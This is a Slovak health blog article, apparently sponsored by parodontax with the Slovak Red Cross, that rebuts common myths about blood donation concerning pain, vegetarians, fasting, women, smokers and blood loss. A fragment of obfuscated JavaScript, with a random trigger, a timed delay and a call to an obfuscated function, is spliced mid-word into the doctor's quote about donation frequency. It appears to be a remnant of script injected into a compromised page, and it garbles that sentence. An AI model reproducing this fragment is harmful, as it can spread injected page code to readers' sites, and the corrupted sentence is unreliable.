Mýty o darovaní krvi, ktoré sa nezakladajú na pravde

| august 24, 2020

Celosvetovo je darcov krvi stále nedostatok a inak tomu nie je ani u nás na Slovensku. Pritom veľa Slovákov vypľúva krv pri čistení zubov do umývadla, čo je zbytočné plytvanie. Informácie o darovanie krvi je potrebné verejne šíriť a pokiaľ je to možné, krv aj darovať. Nikdy totiž nevieme, kedy ju sami budeme potrebovať.

Čo ale nechceme, aby sa šírilo, sú mýty o darovaní krvi, s ktorými ste sa už možno stretli. Rozhodne nie je prekážkou, ak ste žena, fajčíte alebo nekonzumujete mäso. Aj vy môžete darovať krv. Poďme si teda zhrnúť niekoľko najväčších mýtov, ktoré sa vôbec nezakladajú na pravde.

Mýtus: Darovanie krvi bolí

Darovania krvi sa netreba obávať, nie je to zákrok, ktorý by bol bolestivý. Počas odberu krvi sa používa rovnaká ihla, ako pri bežnom odbere u praktického lekára. A s takým odberom sa už pravdepodobne stretol každý z nás. Ak teda zvládnete bežný odber krvi, zvládnete aj jej darovanie.

Darovanie krvi je porovnateľné s bežným odberom, nemusíte sa teda vôbec báť bolesti.” potvrdzuje MUDr. Ján Gyarfáš z Kliniky onkohematológie LFUK a NOÚ v Bratislave. Každý odber krvi trvá približne 7-10 minút, deje sa v príjemnom prostredí  a pod starostlivým dohľadom zdravotníkov,” dodáva lekár.

Mýtus: Vegetariáni nemôžu darovať krv

Vyradenie darcu krvi z evidencie nie je možné bez vážneho dôvodu. Odmietnuť vegetariána, lebo predpokladáme, že vegetariáni majú v krvi menšie množstvo železa je nesprávne. Každý darca krvi pred jej darovaním podstúpi kontrolný odber krvi a konzultuje svoj zdravotný stav, či  životný štýl s lekárom – špecialistom. Napríklad zelená listová zelenina obsahuje vysoké množstvo železa, čím môže byť množstvo železa v krvi vegetariána porovnateľné s človekom, ktorý bežne konzumuje mäso.

Mýtus: Pred odberom nemôžem aspoň deň nič jesťa piť

Pozor! Toto tvrdenie je veľmi rozšírené a nie je pravdivé. Pred darovaním krvi sa naraňajkujte. Pitný režim pred aj po darovaní krvi je veľmi dôležitý. Ideálne sú nesladené tekutiny, môžete si dať aj kávu bez mlieka. Večer vynechajte tučné jedlá, vynechajte tiež alkohol, slané čipsy.

Mýtus: Som žena a darovať krv nemôžem

Tvrdenie, že žena nemôže darovať krv je nesprávne. Celá otázka môže súvisieť s hladinou hemoglobínu v ľudskom tele. Tú majú ženy obvykle o niečo nižšiu ako muži. Ak je zdravotný stav ženy dobrý, váži viac ako 50 kg, nie je tehotná ani nedojčí, jej hladina hemoglobínu v krvi by mala byť v požadovanej výške a krv teda darovať môže. Pravdou je, že počas menštruácie a pár dní po nej sa darovanie krvi ženám neodporúča.

Ženy aj muži sú vítanými darcami krvi. Ženy môžu darovať krv 3-krát do roka, muži 4-krát . Pri jednom darovaní krvi sa štandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andardne odoberá 450 ml, “ hovorí MUDr. Gyarfáš.

Mýtus: Fajčím a to je problém

Aj fajčiar môže darovať krv, ak dodrží odporúčania lekárov – špecialistov v oblasti transfuziológie. Krv, ktorú darcovia darujú má pacientom pomôcť. Ak pred darovaním krvi vydržíte 6 hodín bez cigarety, určite to skúste!

Mýtus: Darovaná krv mi bude v tele chýbať

Ľudské telo obsahuje približne 4-6 litrov krvi. Nemusíte sa preto báť, že vám darovaná krv bude v tele chýbať. Zdravé ľudské telo si totiž krv dokáže znova samo vyrobiť. Krvná plazma a krvné doštičky sa v tele obnovia do 48 hodín, červené krvinky zhruba do mesiaca. Najkratšia doba, po ktorej môže darca znova darovať krv, je osem týždňov.

Mýty sa šíria oveľa rýchlejšie ako dôležité a pravdivé informácie. Snáď sa nám niekoľko mýtov podarilo vyvrátiť a dôležité informácie dostatočne rozšíriť. Správne informácie dokážu podporiť prvodarcov v rozhodnutí darovať krv. Práve preto sa značka parodontax spája so Slovenským Červeným krížom a spoločne hovoria o darovaní krvi. Pridajte sa aj Vy ku kampani Darujte krv a staňte sa darcom krvi. Nájdite odberové centrum vo svojom meste. Využite možnosť objednať sa na čas, ktorý Vám najviac vyhovuje. Prečítajte si dôležité informácie pred darovaním krvi. Všetky informácie o darovaní krvi nájdete na stránke Slovenského Červeného kríža.

Tags:

Category: HOMEPAGE, ZDRAVIE a FIT

Comments are closed.